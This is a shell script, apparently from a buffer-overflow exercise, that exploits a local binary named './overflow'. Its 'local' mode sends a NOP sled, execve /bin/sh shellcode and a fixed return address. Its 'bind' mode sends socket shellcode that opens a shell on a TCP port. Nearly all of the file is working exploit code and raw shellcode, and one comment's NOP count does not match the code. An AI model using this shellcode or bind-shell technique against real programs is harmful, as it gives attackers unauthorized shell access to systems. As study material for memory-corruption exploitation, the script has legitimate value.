exploit.sh


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

#!/bin/sh

# shellcode generated with metasploit (exec /bin/sh):
#   ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
# return addr ./overflow (x86): 0xbffff412

if [ -z "$1" ]; then
	echo "$0 [local|bind]"
	exit 1
fi

echo "$0: exec exploit .."
if [ "$1" = "local" ]; then
	if [ $(getconf LONG_BIT) -eq 32 ]; then
		# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
		# uses own shellcode: shellcode/hello.asm (x86-nasm)
		./overflow `python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 + "\x12\xf4\xff\xbf"'`
	fi
elif [ "$1" = "bind" ]; then
	if [ $(getconf LONG_BIT) -eq 32 ]; then
		# 85 bytes NOP + 134 bytes shellcode + 85 bytes NOP + return addr
		# uses own shellcode: shellcode/socket.asm (x86-nasm)
		./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\x12\xf4\xff\xbf"'`
	fi
else
	$0
fi